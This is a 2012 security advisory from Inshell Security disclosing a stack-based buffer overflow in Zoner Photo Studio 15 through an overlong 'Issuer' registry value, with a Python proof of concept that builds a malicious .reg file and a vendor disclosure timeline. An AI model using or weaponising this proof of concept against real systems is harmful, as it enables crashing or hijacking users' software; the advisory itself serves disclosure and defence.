Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Zoner Photo Studio Vendor URL: www.zoner.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2012-10-17 Date published: 2012-11-09 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Zoner Photo Studio 15 Build 3 Zoner Photo Studio 15 Build 2, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A stack-based buffer overflow vulnerability has been identified in Zoner Photo Studio 15 Build 2 and 3. When launching, the application loads the "Issuer" value from the registry key "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]", but it does not validate the length of the string loaded from the key before passing it to a buffer, which leads to a stack-based buffer overflow. An attacker needs to force the victim to import an arbitrary .reg file to exploit this vulnerability. 5. PROOF-OF-CONCEPT (CODE / Exploit) ------------------------------------ #!/usr/bin/python file="poc.reg" junk1="\x41" * 2140 boom="\x42\x42\x42\x42" junk2="\x43" * 1000 poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n" poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\"" try: print "[*] Creating exploit file...\n"; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!"; For technical details, screenshots and/or PoCs visit: http://security.inshell.net/advisory/42 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2012-10-17: Initial notification sent to vendor about bug in Build 2 2012-10-18: Vendor Feedback / Response 2012-10-22: Short vendor statement about expected delay 2012-10-29: Notification about the disclosure date 2012-**-**: Vendor releases Build 3 which is still vulnerable 2012-11-09: No response 2012-11-09: Full Disclosure according to disclosure policy 8. REFERENCES ------------- http://security.inshell.net